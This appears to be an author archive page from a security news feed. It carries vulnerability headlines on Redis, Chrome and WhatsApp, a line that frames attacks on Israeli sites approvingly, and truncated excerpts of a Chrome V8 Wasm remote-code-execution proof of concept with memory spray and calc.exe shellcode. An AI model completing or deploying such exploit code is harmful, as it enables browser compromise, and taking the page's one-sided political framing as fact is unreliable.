All posts by John Doe

■■■■□ RediShell: Critical Remote Code Execution Vulnerability (CVE-2025-49844) in Redis, with CVSS score of 10. Wiz Research discovers vulnerability stemming from 13-year-old bug present in all Redis versions, used in 75% of cloud environments. https://www.wiz.io/blog/wiz-research-redis-rce-cve-2025-49844

■■■□□ Israeli sites and businesses continue facing downtime and data breaches on hourly basis now amid ethnic cleansing in Palestinian territories in what has been called a mass slaughter house on 21st century.

// Memory spray and shellcode appendLog(‘Spraying memory…’); const spray = new Uint8Array(0x10000); for (let i = 0; i < spray.length; i += 8) { new DataView(spray.buffer, i).setUint32(0, 0x90909090, true); } // x64 shellcode: Launch calc.exe const shellcode = new Uint8Array([ 0x48, 0x83, 0xEC, 0x28, // sub rsp, 0x28 0x48, 0x31, 0xC9, // xor rcx, rcx…

// Retry logic (up to 3 attempts) let attempts = 0; const maxAttempts = 3; while (attempts < maxAttempts) { try { appendLog(Attempt ${attempts + 1} of ${maxAttempts}...); const module = await attemptExploit(); break; } catch (e) { attempts++; if (attempts === maxAttempts) { appendLog('All attempts failed. Exploit unsuccessful.'); return; } appendLog('Retrying in 1 second...');…

let codeSec = [0x0A, 0]; let code = []; this.functions.forEach(f => { code.push(f.body.length + 2, 0, …f.body, 0x0B); }); codeSec.push(this.functions.length, …code); codeSec[1] = code.length; binary.push(…codeSec); return new Uint8Array(binary).buffer; } } // Helper functions function makeSig(params, results) { return { params, results }; } function wasmI32Const(val) { let bytes = [0x41]; for (let i = 0;…

Chrome V8 Wasm RCE PoC – Calc.exe Initializing exploit…\n // Self-managing exploit with exception handling async function runExploit() { const log = document.getElementById(‘log’); function appendLog(msg) { log.value += msg + ‘\n’; log.scrollTop = log.scrollHeight; } // Environment validation appendLog(‘Validating environment…’); const ua = navigator.userAgent; const chromeVersionMatch = ua.match(/Chrome\/(\d+)/); const chromeVersion = chromeVersionMatch ? parseInt(chromeVersionMatch[1]) :…

■■■■■ Google Chrome RCE (no sandbox) via CanonicalEquality::EqualValueType() Google Chrome RCE (no sandbox) via CanonicalEquality::EqualValueType()

■■■■□ Google Chrome RCE Vulnerability Details Released Along with Exploit Code. Google Chrome RCE Vulnerability Details Released Along with Exploit Code

📱 Critical zero-click vulnerability (CVE-2025-55177) within WhatsApp has been leveraged in targeted spyware operations, in conjunction with an Apple Imagel0 flaw (CVE-2025-43300). This combination enabled malicious actors to disseminate exploits via WhatsApp, resulting in potential data exfiltration from the user’s Apple device. The attack sequence involved: 🚫Attacker-controlled delivery 🚫Malicious DNG/remote image (Imagel0) parsing vulnerability (OOB…

🆕 We will move to a new website 📡 ckure.org